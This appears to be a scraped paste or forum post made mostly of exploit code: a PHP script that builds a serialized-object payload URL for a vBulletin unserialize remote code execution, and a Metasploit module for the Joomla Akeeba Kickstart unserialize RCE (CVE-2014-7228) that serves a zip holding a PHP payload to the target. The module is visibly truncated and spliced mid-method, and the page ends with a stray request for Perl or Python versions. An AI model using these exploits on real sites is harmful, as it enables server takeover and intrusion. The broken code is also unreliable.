EcHoLL

<?php if ($argc < 3) { print 'php ' . $argv[0] . ' <target> <payload>'; die(); } class vB_Database { public $functions = array(); public function __construct() { $this->functions['free_result'] = $argv[2]; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } $x = urlencode(serialize(new vB_dB_Result())); print 'http://' . $argv[1] . '/ajax/api/hook/decodeArguments?arguments=' . $x; ?>

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' require 'json' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Akeeba Kickstart Unserialize Remote Code Execution", 'Description' => %q{ This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba component, which is responsible for Joomla! updates. Nevertheless it is worth to note that this vulnerability is only exploitable during the update of the Joomla! CMS. }, 'License' => MSF_LICENSE, 'Author' => [ 'Johannes Dahse', # Vulnerability discovery 'us3r777 <us3r777[at]n0b0.so>' # Metasploit module ], 'References' => [ [ 'CVE', '2014-7228' ], [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'], [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'], [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'], ], 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'DisclosureDate' => "Sep 29 2014", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']), OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5]) ], self.class) end def check res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php') ) if res && res.code == 200 return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def primer srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip" php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}' php_filename = rand_text_alpha(8 + rand(8)) + '.php' # Create the zip archive print_status("Creating archive with file #{php_filename}") zip_file = Rex::Zip::Archive.new zip_file.add_file(php_filename, payload.encoded) @zip, { 'Content-Type' => 'application/zip' }) return end print_status("Sending not found...") send_not_found(cli) end end exploit perl or python editions?